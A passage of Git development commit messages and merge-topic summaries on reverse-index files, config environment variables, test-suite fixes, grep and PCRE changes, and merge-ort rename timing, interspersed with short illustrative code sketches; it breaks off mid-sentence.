Currently, when called with exactly two arguments, `git range-diff`
tests for a literal `..` in each of the two. Likewise, the argument
provided via `--range-diff` to `git format-patch` is checked in the same
manner.
However, `<commit>^!` is a perfectly valid commit range, equivalent to
`<commit>^..<commit>` according to the `SPECIFYING RANGES` section of
gitrevisions(7).
In preparation for allowing more sophisticated ways to specify commit
ranges, let's refactor the check into its own function.
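A minimal sketch of such a helper, assuming it keeps the current
"literal `..`" test unchanged; the name toy_is_range() is hypothetical
and not necessarily what the patch calls it.

```c
#include <string.h>

/*
 * Hypothetical helper: report whether arg looks like a commit range.
 * For now this only recognizes a literal "..", which also matches
 * the three-dot form.
 */
int toy_is_range(const char *arg)
{
	return strstr(arg, "..") != NULL;
}
```

With the check in one place, teaching it about forms such as
`<commit>^!` (which this version still rejects) later means touching a
single function instead of every caller.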
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
'./t1234-foo.sh --stress-jobs=X ...' is supposed to run that test
script in X parallel jobs, but the number of jobs specified on the
command line is entirely ignored if other '--stress'-related options
follow. I.e. both './t1234-foo.sh --stress-jobs=X --stress-limit=Y'
and './t1234-foo.sh --stress-jobs=X --stress' fall back to using twice
as many parallel jobs as there are CPUs instead.
The former has been broken since commit de69e6f6c9 (tests: let
--stress-limit=<N> imply --stress, 2019-03-03) [1], which started to
unconditionally overwrite the $stress variable holding the specified
number of jobs in its effort to imply '--stress'. The latter has been
broken since f545737144 (tests: introduce --stress-jobs=<N>,
2019-03-03), because it didn't consider that handling '--stress' will
overwrite that variable as well.
We could fix this by being more careful about (over)writing that
$stress variable and checking first whether it has already been set.
But I think it's cleaner to use a dedicated variable to hold the
number of specified parallel jobs, so let's do that instead.
[1] In de69e6f6c9 there was no '--stress-jobs=X' option yet, the
number of parallel jobs had to be specified via '--stress=X', so,
strictly speaking, de69e6f6c9 broke './t1234-foo.sh --stress=X
--stress-limit=Y'.
Signed-off-by: SZEDER Gábor <szeder.dev@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Remove the hidden "grep --debug" and "log --grep-debug" options added
in 17bf35a3c7 (grep: teach --debug option to dump the parse tree,
2012-09-13).
At the time these options seem to have been intended to go along with
a documentation discussion and to help the author of relevant tests to
perform ad-hoc debugging on them[1].
Reasons to want this gone:
1. They were never documented, and the only (rather trivial) use of
them in our own codebase for testing is something I removed back
in e01b4dab01 (grep: change non-ASCII -i test to stop using
--debug, 2017-05-20).
2. Googling around doesn't show any in-the-wild uses I could dig up,
and on the Git ML the only mentions after the original discussion
seem to have been when they came up in unrelated diff contexts, or
that test commit of mine.
3. An exception to that is c581e4a749 (grep: under --debug, show
whether PCRE JIT is enabled, 2019-08-18) where we added the
ability to dump out when PCREv2 has the JIT in effect.
The combination of that and my earlier b65abcafc7 (grep: use PCRE
v2 for optimized fixed-string search, 2019-07-01) means Git prints
this out in its most common in-the-wild configuration:
$ git log --grep-debug --grep=foo --grep=bar --grep=baz --all-match
pcre2_jit_on=1
pcre2_jit_on=1
pcre2_jit_on=1
[all-match]
(or
pattern_body<body>foo
(or
pattern_body<body>bar
pattern_body<body>baz
)
)
$ git grep --debug \( -e foo --and -e bar \) --or -e baz
pcre2_jit_on=1
pcre2_jit_on=1
pcre2_jit_on=1
(or
(and
patternfoo
patternbar
)
patternbaz
)
I.e. for each pattern we're considering for the and/or/--all-match
etc. debugging we'll now diligently spew out another identical line
saying whether the PCREv2 JIT is on or not.
I think the fact that nobody's complained about that rather glaringly
bad output says something about how much this is used, i.e. it's
not.
The need for this debugging aid for the composed grep/log patterns
seems to have passed, and the desire to dump the JIT config seems to
have been another one-off around the time we had JIT-related issues on
the PCREv2 codepath. That the original author of this debugging
facility seemingly hasn't noticed the bad output since then[2] is
probably some indicator.
1. https://lore.kernel.org/git/cover.1347615361.git.git@drmicha.warpmail.net/
2. https://lore.kernel.org/git/xmqqk1b8x0ac.fsf@gitster-ct.c.googlers.com/
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When an on-disk reverse index exists, there is no need to generate one
in memory. In fact, doing so can be slow, and require large amounts of
the heap.
Let's make sure that we treat the on-disk reverse index with precedence
(i.e., that when it exists, we don't bother trying to generate an
equivalent one in memory) by teaching Git how to conditionally die()
when generating a reverse index in memory.
Then, add a test to ensure that when (a) an on-disk reverse index
exists, and (b) GIT_TEST_REV_INDEX_DIE_IN_MEMORY is set, we do not die,
implying that we read from the on-disk one.
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Add a new option that unconditionally enables the pack.writeReverseIndex
setting in order to run the whole test suite in a mode that generates
on-disk reverse indexes. Additionally, enable this mode in the second
run of tests under linux-gcc in 'ci/run-build-and-tests.sh'.
Once on-disk reverse indexes are proven out over several releases, we
can change the default value of that configuration to 'true', and drop
this patch.
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In the next patch, we'll add support for unconditionally enabling the
'pack.writeReverseIndex' setting with a new GIT_TEST_WRITE_REV_INDEX
environment variable.
This causes a little bit of fallout with tests that, for example,
compare the list of files in the pack directory and are unprepared to
see .rev files in the output.
Those locations can be cleaned up to look for specific file extensions,
rather than take everything in the pack directory (for instance) and
then grep out unwanted items.
Once the pack.writeReverseIndex option has been thoroughly
tested, we will default it to 'true', removing GIT_TEST_WRITE_REV_INDEX,
and making it possible to revert this patch.
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Now that the pack.writeReverseIndex configuration is respected in both
'git index-pack' and 'git pack-objects' (and therefore, all of their
callers), we can safely advertise it for use in the git-config manual.
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Now that we have an implementation that can write the new reverse index
format, enable writing a .rev file in 'git pack-objects' by consulting
the pack.writeReverseIndex configuration variable.
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Teach 'git index-pack' to optionally write and verify reverse index with
'--[no-]rev-index', as well as respecting the 'pack.writeReverseIndex'
configuration option.
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
To derive the filename for a .idx file, 'git index-pack' uses
derive_filename() to strip the '.pack' suffix and add the new suffix.
Prepare for stripping off suffixes other than '.pack' by making the
suffix to strip a parameter of derive_filename(). In order to make this
consistent with the "suffix" parameter which does not begin with a ".",
add an additional check in derive_filename().
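As a rough illustration of the parameterized suffix handling, here is a
minimal Python sketch (not Git's C implementation). The function name
mirrors derive_filename(), but the argument order and the error text are
assumptions made for this example.

```python
def derive_filename(pack_name: str, strip: str, suffix: str) -> str:
    """Replace the trailing '.<strip>' of pack_name with '.<suffix>'.

    Neither 'strip' nor 'suffix' begins with a '.', so the dot in front
    of the stripped suffix has to be checked separately.
    """
    message = f"packfile name '{pack_name}' does not end with '.{strip}'"
    if not pack_name.endswith(strip):
        raise ValueError(message)
    stem = pack_name[: len(pack_name) - len(strip)]
    # The additional check: what remains must end with the '.' separator.
    if not stem.endswith("."):
        raise ValueError(message)
    return stem + suffix
```

With this shape, the same helper can derive both 'pack-1234.idx' and
'pack-1234.rev' from 'pack-1234.pack'.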
Suggested-by: Jeff King <peff@peff.net>
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This patch prepares for callers to be able to write reverse index files
to disk.
It adds the necessary machinery to write a format-compliant .rev file
from within 'write_rev_file()', which is called from
'finish_tmp_packfile()'.
Similar to the process by which the reverse index is computed in memory,
these new paths also have to sort a list of objects by their offsets
within a packfile. These new paths use a qsort() (as opposed to a radix
sort), since our specialized radix sort requires a full revindex_entry
struct per object, which is more memory than we need to allocate.
The qsort is obviously slower, but the theoretical slowdown would
require a repository with a large number of objects, likely implying
that the time spent in, say, pack-objects during a repack would dominate
the overall runtime.
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Specify the format of the on-disk reverse index 'pack-*.rev' file, as
well as prepare the code for the existence of such files.
The reverse index maps from pack relative positions (i.e., an index into
the array of objects, which is sorted by their offsets within the
packfile) to their position within the 'pack-*.idx' file. Today, this is
done by building up a list of (off_t, uint32_t) tuples for each object
(the off_t corresponding to that object's offset, and the uint32_t
corresponding to its position in the index). To convert between pack and
index position quickly, this array of tuples is radix sorted based on
its offset.
This has two major drawbacks:
First, the in-memory cost scales linearly with the number of objects in
a pack. Each 'struct revindex_entry' is sizeof(off_t) +
sizeof(uint32_t) + padding bytes for a total of 16.
To observe this, force Git to load the reverse index by, for example,
running 'git cat-file --batch-check="%(objectsize:disk)"'. When asking
for a single object in a fresh clone of the kernel, Git needs to
allocate 120+ MB of memory in order to hold the reverse index in memory.
Second, the cost to sort also scales with the size of the pack.
Luckily, this is a linear function since 'load_pack_revindex()' uses a
radix sort, but this cost still must be paid once per pack per process.
As an example, it takes ~60x longer to print the _size_ of an object than
it does to print that entire object's _contents_:
Benchmark #1: git.compile cat-file --batch <obj
Time (mean ± σ): 3.4 ms ± 0.1 ms [User: 3.3 ms, System: 2.1 ms]
Range (min … max): 3.2 ms … 3.7 ms 726 runs
Benchmark #2: git.compile cat-file --batch-check="%(objectsize:disk)" <obj
Time (mean ± σ): 210.3 ms ± 8.9 ms [User: 188.2 ms, System: 23.2 ms]
Range (min … max): 193.7 ms … 224.4 ms 13 runs
Instead, avoid computing and sorting the revindex once per process by
writing it to a file when the pack itself is generated.
The format is relatively straightforward. It contains an array of
uint32_t's, the length of which is equal to the number of objects in the
pack. The ith entry in this table contains the index position of the
ith object in the pack, where "ith object in the pack" is determined by
pack offset.
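The table described above can be sketched in a few lines of Python. This
is only a model of the mapping, not the on-disk writer or reader: the
helper names build_rev_table() and the list-based "index" are
assumptions for illustration, while pack_pos_to_index() and
offset_to_pack_pos() borrow the names used elsewhere in this series.

```python
def build_rev_table(offsets_in_index_order):
    """Return the .rev payload: index positions ordered by pack offset."""
    return sorted(
        range(len(offsets_in_index_order)),
        key=lambda index_pos: offsets_in_index_order[index_pos],
    )


def pack_pos_to_index(rev_table, pack_pos):
    """O(1): the i-th entry holds the index position of the i-th object."""
    return rev_table[pack_pos]


def offset_to_pack_pos(rev_table, offsets_in_index_order, offset):
    """Binary search over pack positions, asking the index for each offset."""
    lo, hi = 0, len(rev_table)
    while lo < hi:
        mid = (lo + hi) // 2
        mid_offset = offsets_in_index_order[rev_table[mid]]
        if mid_offset < offset:
            lo = mid + 1
        elif mid_offset > offset:
            hi = mid
        else:
            return mid
    return -1  # no object starts at this offset
```

Note that the table itself stores no offsets; every probe of the binary
search goes back to the index to learn an object's offset.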
One thing that the on-disk format does _not_ contain is the full (up to)
eight-byte offset corresponding to each object. This is something that
the in-memory revindex contains (it stores an off_t in 'struct
revindex_entry' along with the same uint32_t that the on-disk format
has). Omit it in the on-disk format, since knowing the index position
for some object is sufficient to get a constant-time lookup in the
pack-*.idx file to ask for an object's offset within the pack.
This trades the on-disk size of the 'pack-*.rev' file against the
runtime needed to chase down the offset for some object. Even though the lookup
is constant time, the constant is heavier, since it can potentially
involve two pointer walks in v2 indexes (one to access the 4-byte offset
table, and potentially a second to access the double wide offset table).
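The two possible pointer walks can be modeled as follows. This is a
sketch under assumptions: the two tables are passed in as separate byte
strings rather than located inside a real .idx file, and the convention
that a set most-significant bit redirects to the double wide table is
taken from my reading of Git's pack format documentation, not from this
patch.

```python
import struct


def nth_object_offset(small_table: bytes, large_table: bytes, n: int) -> int:
    """Look up the pack offset of the n-th object in a v2-style index."""
    # First walk: the 4-byte, network-byte-order offset table.
    (entry,) = struct.unpack_from(">I", small_table, 4 * n)
    if not entry & 0x80000000:
        return entry
    # Second walk: the low 31 bits select a slot in the 8-byte table.
    (offset,) = struct.unpack_from(">Q", large_table, 8 * (entry & 0x7FFFFFFF))
    return offset
```

Only objects stored beyond the range of the 4-byte table pay for the
second walk.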
Consider trying to map an object's pack offset to a relative position
within that pack. In a cold-cache scenario, more page faults occur while
switching between binary searching through the reverse index and
searching through the *.idx file for an object's offset. Sure enough,
with a cold cache (writing '3' into '/proc/sys/vm/drop_caches' after
'sync'ing), printing out the entire object's contents is still
marginally faster than printing its size:
Benchmark #1: git.compile cat-file --batch-check="%(objectsize:disk)" <obj >/dev/null
Time (mean ± σ): 22.6 ms ± 0.5 ms [User: 2.4 ms, System: 7.9 ms]
Range (min … max): 21.4 ms … 23.5 ms 41 runs
Benchmark #2: git.compile cat-file --batch <obj >/dev/null
Time (mean ± σ): 17.2 ms ± 0.7 ms [User: 2.8 ms, System: 5.5 ms]
Range (min … max): 15.6 ms … 18.2 ms 45 runs
(Numbers taken in the kernel after cheating and using the next patch to
generate a reverse index). There are a couple of approaches to improve
cold cache performance not pursued here:
- We could include the object offsets in the reverse index format.
Predictably, this does result in fewer page faults, but it triples
the size of the file, while simultaneously duplicating a ton of data
already available in the .idx file. (This was the original way I
implemented the format, and it did show
`--batch-check='%(objectsize:disk)'` winning out against `--batch`.)
On the other hand, this increase in size also results in a large
block-cache footprint, which could potentially hurt other workloads.
- We could store the mapping from pack to index position in a more
cache-friendly way, like constructing a binary search tree from the
table and writing the values in breadth-first order. This would
result in much better locality, but the price you pay is trading
O(1) lookup in 'pack_pos_to_index()' for an O(log n) one (since you
can no longer directly index the table).
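To make the second alternative concrete, here is a minimal sketch of a
breadth-first (sometimes called Eytzinger) layout of a sorted array. It
is not something this patch implements; the function names are
hypothetical and the keys stand in for whatever value the table would be
searched by.

```python
def breadth_first_layout(sorted_values):
    """Store a sorted sequence as an implicit binary search tree (BFS order)."""
    n = len(sorted_values)
    tree = [None] * (n + 1)  # 1-based slots; slot k has children 2k and 2k+1
    values = iter(sorted_values)

    def fill(k):
        # In-order traversal of the implicit tree visits slots in sorted order.
        if k <= n:
            fill(2 * k)
            tree[k] = next(values)
            fill(2 * k + 1)

    fill(1)
    return tree[1:]


def search(tree, key):
    """Return the slot holding key, or -1. Always walks from the root."""
    k = 1
    while k <= len(tree):
        value = tree[k - 1]
        if value == key:
            return k - 1
        k = 2 * k + (1 if key > value else 0)
    return -1
```

The first few probes of every search touch neighboring slots near the
front of the array, which is where the locality comes from. The cost is
the one noted above: the i-th smallest element can no longer be read
with a single array access.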
So, neither of these approaches is taken here. (Thankfully, the format
is versioned, so we are free to pursue these in the future.) But, cold
cache performance likely isn't interesting outside of one-off cases like
asking for the size of an object directly. In real-world usage, Git is
often performing many operations in the revindex (i.e., asking about
many objects rather than a single one).
The trade-off is worth it, since we will avoid so much of the cost of
generating the revindex that the extra pointer chase will look like
noise in the following patch's benchmarks.
This patch describes the format and prepares callers (like in
pack-revindex.c) to be able to read *.rev files once they exist. An
implementation of the writer will appear in the next patch, and callers
will gradually begin using the writer in the patches that
follow after that.
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Abstract accesses to in-core revindex that allows enumerating
objects stored in a packfile in the order they appear in the pack,
in preparation for introducing an on-disk precomputed revindex.
* tb/pack-revindex-api: (21 commits)
for_each_object_in_pack(): clarify pack vs index ordering
pack-revindex.c: avoid direct revindex access in 'offset_to_pack_pos()'
pack-revindex: hide the definition of 'revindex_entry'
pack-revindex: remove unused 'find_revindex_position()'
pack-revindex: remove unused 'find_pack_revindex()'
builtin/gc.c: guess the size of the revindex
for_each_object_in_pack(): convert to new revindex API
unpack_entry(): convert to new revindex API
packed_object_info(): convert to new revindex API
retry_bad_packed_offset(): convert to new revindex API
get_delta_base_oid(): convert to new revindex API
rebuild_existing_bitmaps(): convert to new revindex API
try_partial_reuse(): convert to new revindex API
get_size_by_pos(): convert to new revindex API
show_objects_for_type(): convert to new revindex API
bitmap_position_packfile(): convert to new revindex API
check_object(): convert to new revindex API
write_reused_pack_verbatim(): convert to new revindex API
write_reused_pack_one(): convert to new revindex API
write_reuse_object(): convert to new revindex API
...
Update the Code-of-conduct to version 2.0 from the upstream (we've
been using version 1.4).
* ab/coc-update-to-2.0:
CoC: update to version 2.0 + local changes
CoC: explicitly take any whitespace breakage
CoC: Update word-wrapping to match upstream
Introduce two new ways to feed configuration variable-value pairs
via environment variables, and tweak the way GIT_CONFIG_PARAMETERS
encodes variable/value pairs to make it more robust.
* ps/config-env-pairs:
config: allow specifying config entries via envvar pairs
environment: make `getenv_safe()` a public function
config: store "git -c" variables using more robust format
config: parse more robust format in GIT_CONFIG_PARAMETERS
config: extract function to parse config pairs
quote: make sq_dequote_step() a public function
config: add new way to pass config via `--config-env`
git: add `--super-prefix` to usage string
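As a hedged illustration of the environment-variable pairs, the sketch
below builds an environment for a child Git process. The variable names
GIT_CONFIG_COUNT, GIT_CONFIG_KEY_<n> and GIT_CONFIG_VALUE_<n> (numbered
from zero) are quoted from the git-config documentation as I recall it,
not from the text above; the helper name config_env() is hypothetical.

```python
import os


def config_env(pairs, base_env=None):
    """Return a copy of the environment carrying the given config pairs."""
    env = dict(os.environ if base_env is None else base_env)
    env["GIT_CONFIG_COUNT"] = str(len(pairs))
    for n, (key, value) in enumerate(pairs):
        env[f"GIT_CONFIG_KEY_{n}"] = key
        env[f"GIT_CONFIG_VALUE_{n}"] = value
    return env
```

The result could then be passed as the env argument of subprocess.run()
when invoking git, which keeps the values off the command line.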
A bit of code refactoring.
* cc/write-promisor-file:
pack-write: die on error in write_promisor_file()
fetch-pack: refactor writing promisor file
fetch-pack: rename helper to create_promisor_file()
"git bundle" learns "--stdin" option to read its refs from the
standard input. Also, it now does not lose refs when they point
at the same object.
* jx/bundle:
bundle: arguments can be read from stdin
bundle: lost objects when removing duplicate pendings
test: add helper functions for git-bundle
Clean-up docs, codepaths and tests around mailmap.
* ab/mailmap: (22 commits)
shortlog: remove unused(?) "repo-abbrev" feature
mailmap doc + tests: document and test for case-insensitivity
mailmap tests: add tests for empty "<>" syntax
mailmap tests: add tests for whitespace syntax
mailmap tests: add a test for comment syntax
mailmap doc + tests: add better examples & test them
tests: refactor a few tests to use "test_commit --append"
test-lib functions: add an --append option to test_commit
test-lib functions: add --author support to test_commit
test-lib functions: document arguments to test_commit
test-lib functions: expand "test_commit" comment template
mailmap: test for silent exiting on missing file/blob
mailmap tests: get rid of overly complex blame fuzzing
mailmap tests: add a test for "not a blob" error
mailmap tests: remove redundant entry in test
mailmap tests: improve --stdin tests
mailmap tests: modernize syntax & test idioms
mailmap tests: use our preferred whitespace syntax
mailmap doc: start by mentioning the comment syntax
check-mailmap doc: note config options
...
"git fetch" learns to treat ref updates atomically in all-or-none
fashion, just like "git push" does, with the new "--atomic" option.
* ps/fetch-atomic:
fetch: implement support for atomic reference updates
fetch: allow passing a transaction to `s_update_ref()`
fetch: refactor `s_update_ref` to use common exit path
fetch: use strbuf to format FETCH_HEAD updates
fetch: extract writing to FETCH_HEAD
When more than one commit with the same patch ID appears on one
side, "git log --cherry-pick A...B" did not exclude them all when a
commit with the same patch ID appears on the other side. Now it
does.
* jk/log-cherry-pick-duplicate-patches:
patch-ids: handle duplicate hashmap entries
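The intended behavior can be modeled with a map from patch ID to a list
of commits. This is a simplified sketch, not the hashmap code in
patch-ids.c; the function name and the (commit, patch_id) tuples are
assumptions for illustration.

```python
from collections import defaultdict


def cherry_pick_filter(left, right):
    """Drop commits whose patch ID also appears on the other side.

    left and right are lists of (commit, patch_id) tuples.
    """
    by_patch_id = defaultdict(list)
    for commit, patch_id in left:
        # Keep every commit that shares a patch ID, not just one of them.
        by_patch_id[patch_id].append(commit)

    dropped_left = set()
    kept_right = []
    for commit, patch_id in right:
        if patch_id in by_patch_id:
            dropped_left.update(by_patch_id[patch_id])
        else:
            kept_right.append(commit)

    kept_left = [commit for commit, _ in left if commit not in dropped_left]
    return kept_left, kept_right
```

A map that kept only one commit per patch ID would leave the other
duplicates in the output, which is the behavior described as broken.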
Prepare tests not to be affected by the name of the default branch
"git init" creates.
* js/default-branch-name-tests-final-stretch: (28 commits)
tests: drop prereq `PREPARE_FOR_MAIN_BRANCH` where no longer needed
t99*: adjust the references to the default branch name "main"
tests(git-p4): transition to the default branch name `main`
t9[5-7]*: adjust the references to the default branch name "main"
t9[0-4]*: adjust the references to the default branch name "main"
t8*: adjust the references to the default branch name "main"
t7[5-9]*: adjust the references to the default branch name "main"
t7[0-4]*: adjust the references to the default branch name "main"
t6[4-9]*: adjust the references to the default branch name "main"
t64*: preemptively adjust alignment to prepare for `master` -> `main`
t6[0-3]*: adjust the references to the default branch name "main"
t5[6-9]*: adjust the references to the default branch name "main"
t55[4-9]*: adjust the references to the default branch name "main"
t55[23]*: adjust the references to the default branch name "main"
t551*: adjust the references to the default branch name "main"
t550*: adjust the references to the default branch name "main"
t5503: prepare aligned comment for replacing `master` with `main`
t5[0-4]*: adjust the references to the default branch name "main"
t5323: prepare centered comment for `master` -> `main`
t4*: adjust the references to the default branch name "main"
...
After expiring a reflog and making a single commit, the reflog for
the branch would record a single entry that knows both @{0} and
@{1}, but we failed to answer "what commit were we on?", i.e. @{1}.
* dl/reflog-with-single-entry:
refs: allow @{n} to work with n-sized reflog
refs: factor out set_read_ref_cutoffs()
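A small model shows why a single reflog entry is enough to answer both
questions: each entry records the value before and after the update.
The function below is a sketch with a hypothetical name and a simplified
entry representation, not the logic in refs.c.

```python
def resolve_reflog(entries, n):
    """Resolve @{n} from a newest-first list of (old_oid, new_oid) entries."""
    if n < len(entries):
        return entries[n][1]  # the value the ref had after that update
    if entries and n == len(entries):
        # One step past the oldest entry: fall back to its "old" side.
        return entries[-1][0]
    raise LookupError(f"log only has {len(entries)} entries")
```

With a single entry ("aaa", "bbb"), @{0} resolves to "bbb" and @{1}
resolves to "aaa".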
"git diff" showed a submodule working tree with untracked cruft as
"Submodule commit <objectname>-dirty", but a natural expectation is
that the "-dirty" indicator would align with "git describe --dirty",
which does not consider having untracked files in the working tree
as source of dirtiness. The inconsistency has been fixed.
* sj/untracked-files-in-submodule-directory-is-not-dirty:
diff: do not show submodule with untracked files as "-dirty"
Warn loudly when the "pack-redundant" command, which has been left
stale with almost unusable performance issues, gets used, as we no
longer want to recommend its use (just use "repack -d" instead).
* jc/deprecate-pack-redundant:
pack-redundant: gauge the usage before proposing its removal
Newline characters in the host and path part of git:// URL are
now forbidden.
* jk/forbid-lf-in-git-url:
fsck: reject .gitmodules git:// urls with newlines
git_connect_git(): forbid newlines in host and path
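The check amounts to rejecting a newline in either component before
the request is sent. A minimal sketch, with a hypothetical function
name and error text:

```python
def check_git_url_parts(host: str, path: str) -> None:
    """Refuse git:// host or path components that contain a newline."""
    for label, value in (("host", host), ("path", path)):
        if "\n" in value:
            raise ValueError(f"newline is forbidden in git:// {label}")
```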
The implementation of "git branch --sort" wrt the detached HEAD
display has always been hacky, which has been cleaned up.
* ab/branch-sort:
branch: show "HEAD detached" first under reverse sort
branch: sort detached HEAD based on a flag
ref-filter: move ref_sorting flags to a bitfield
ref-filter: move "cmp_fn" assignment into "else if" arm
ref-filter: add braces to if/else if/else chain
branch tests: add to --sort tests
branch: change "--local" to "--list" in comment
File-level rename detection updates.
* en/diffcore-rename:
diffcore-rename: remove unnecessary duplicate entry checks
diffcore-rename: accelerate rename_dst setup
diffcore-rename: simplify and accelerate register_rename_src()
t4058: explore duplicate tree entry handling in a bit more detail
t4058: add more tests and documentation for duplicate tree entry handling
diffcore-rename: reduce jumpiness in progress counters
diffcore-rename: simplify limit check
diffcore-rename: avoid usage of global in too_many_rename_candidates()
diffcore-rename: rename num_create to num_destinations
Rename detection is added to the "ORT" merge strategy.
* en/merge-ort-3:
merge-ort: add implementation of type-changed rename handling
merge-ort: add implementation of normal rename handling
merge-ort: add implementation of rename collisions
merge-ort: add implementation of rename/delete conflicts
merge-ort: add implementation of both sides renaming differently
merge-ort: add implementation of both sides renaming identically
merge-ort: add basic outline for process_renames()
merge-ort: implement compare_pairs() and collect_renames()
merge-ort: implement detect_regular_renames()
merge-ort: add initial outline for basic rename detection
merge-ort: add basic data structures for handling renames
"git mktag" validates its input using its own rules before writing
a tag object---it has been updated to share the logic with "git
fsck".
* ab/mktag: (23 commits)
mktag: add a --[no-]strict option
mktag: mark strings for translation
mktag: convert to parse-options
mktag: allow omitting the header/body \n separator
mktag: allow turning off fsck.extraHeaderEntry
fsck: make fsck_config() re-usable
mktag: use fsck instead of custom verify_tag()
mktag: use puts(str) instead of printf("%s\n", str)
mktag: remove redundant braces in one-line body "if"
mktag: use default strbuf_read() hint
mktag tests: test verify_object() with replaced objects
mktag tests: improve verify_object() test coverage
mktag tests: test "hash-object" compatibility
mktag tests: stress test whitespace handling
mktag tests: run "fsck" after creating "mytag"
mktag tests: don't create "mytag" twice
mktag tests: don't redirect stderr to a file needlessly
mktag tests: remove needless SHA-1 hardcoding
mktag tests: use "test_commit" helper
mktag tests: don't needlessly use a subshell
...
Improve the support for invalid UTF-8 haystacks given a non-ASCII
needle when using the PCREv2 backend.
This is a more complete fix for a bug I started to fix in
870eea8166 (grep: do not enter PCRE2_UTF mode on fixed matching,
2019-07-26), now that PCREv2 has the PCRE2_MATCH_INVALID_UTF mode we
can make use of it.
This fixes the sort of case described in 8a5999838e (grep: stess test
PCRE v2 on invalid UTF-8 data, 2019-07-26), i.e.:
- The subject string is non-ASCII (e.g. "ævar")
- We're under a is_utf8_locale(), e.g. "en_US.UTF-8", not "C"
- We are using --ignore-case, or we're a non-fixed pattern
If those conditions were satisfied and we found non-valid
UTF-8 data, PCREv2 might bark on it. In practice this only happened
under the JIT backend (turned on by default on most platforms).
Ultimately this fixes a "regression" in b65abcafc7 ("grep: use PCRE v2
for optimized fixed-string search", 2019-07-01), I'm putting that in
scare-quotes because before then we wouldn't properly support these
complex case-folding, locale etc. cases either, it just broke in
different ways.
There was a bug related to this that was fixed
in PCREv2 10.36. It can be worked around by setting the
PCRE2_NO_START_OPTIMIZE flag. Let's do that in those cases, and add
tests for the bug.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
As noted in [1] when I originally added this test in [2] the test was
completely broken as it lacked a redirect[3]. I now think this whole
thing is overly fragile. Let's only test if we have a segfault here.
Before this the first test's "test_cmp" was pretty meaningless. We
were only testing if PCREv2 was so broken that it would spew out
something completely unrelated on stdout, which isn't very plausible.
In the second test we're relying on PCREv2 forever holding to the
current behavior of the PCRE_UTF8 flag, as opposed to learning some
optimistic graceful fallback to PCRE2_MATCH_INVALID_UTF in the
future. If that happens having this test broken under bisecting would
suck.
A follow-up commit will actually test this case in a meaningful way
under the PCRE2_MATCH_INVALID_UTF flag. Let's run this one
unconditionally, and just make sure we don't segfault.
1. e714b898c6 (t7812: expect failure for grep -i with invalid UTF-8
data, 2019-11-29)
2. 8a5999838e (grep: stess test PCRE v2 on invalid UTF-8 data,
2019-07-26)
3. c74b3cbb83 (t7812: add missing redirects, 2019-11-26)
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Add some timing instrumentation for both merge-ort and diffcore-rename;
I used these to measure and optimize performance in both, and several
future patch series will build on these to reduce the timings of some
select testcases.
=== Setup ===
The primary testcase I used involved rebasing a random topic in the
linux kernel (consisting of 35 patches) against an older version. I
added two variants, one where I rename a toplevel directory, and another
where I only rebase one patch instead of the whole topic. The setup is
as follows:
$ git clone git://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git
$ git branch hwmon-updates fd8bdb23b91876ac1e624337bb88dc1dcc21d67e
$ git branch hwmon-just-one fd8bdb23b91876ac1e624337bb88dc1dcc21d67e~34
$ git branch base 4703d9119972bf586d2cca76ec6438f819ffa30e
$ git switch -c 5.4-renames v5.4
$ git mv drivers pilots # Introduce over 26,000 renames
$ git commit -m "Rename drivers/ to pilots/"
$ git config merge.renameLimit 30000
$ git config merge.directoryRenames true
=== Testcases ===
Now with REBASE standing for either "git rebase [--merge]" (using
merge-recursive) or "test-tool fast-rebase" (using merge-ort), the
testcases are:
Testcase #1: no-renames
$ git checkout v5.4^0
$ REBASE --onto HEAD base hwmon-updates
Note: technically the name is misleading; there are some renames, but
very few. Rename detection only takes about half the overall time.
Testcase #2: mega-renames
$ git checkout 5.4-renames^0
$ REBASE --onto HEAD base hwmon-updates
Testcase #3: just-one-mega
$ git checkout 5.4-renames^0
$ REBASE --onto HEAD base hwmon-just-one
=== Timing results ===
Overall timings, using hyperfine (1 warmup run, 3 runs for mega-renames,
10 runs for the other two cases):
                merge-recursive          merge-ort
no-renames:       18.912 s ±  0.174 s     14.263 s ± 0.053 s
mega-renames:   5964.031 s ± 10.459 s   5504.231 s ± 5.150 s
just-one-mega:   149.583 s ±  0.751 s    158.534 s ± 0.498 s
A single re-run of each with some breakdowns:
--- no-renames ---
                           merge-recursive   merge-ort
overall runtime:                19.302 s      14.257 s
inexact rename detection:        7.603 s       7.906 s
everything else:                11.699 s       6.351 s
--- mega-renames ---
                           merge-recursive   merge-ort
overall runtime:              5950.195 s    5499.672 s
inexact rename detection:     5746.309 s    5487.120 s
everything else:               203.886 s      17.552 s
--- just-one-mega ---
                           merge-recursive   merge-ort
overall runtime:               151.001 s     158.582 s
inexact rename detection:      143.448 s     157.835 s
everything else:                 7.553 s       0.747 s
=== Timing observations ===
0) Maximum speedup
The "everything else" row represents the maximum speedup we could
achieve if we were to somehow infinitely parallelize inexact rename
detection, but leave everything else alone. The fact that this is so
much smaller than the real runtime (even in the case with virtually no
renames) makes it clear just how overwhelmingly large the time spent on
rename detection can be.
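The bound described here is simply the overall runtime divided by the
"everything else" time. The sketch below applies that to the single
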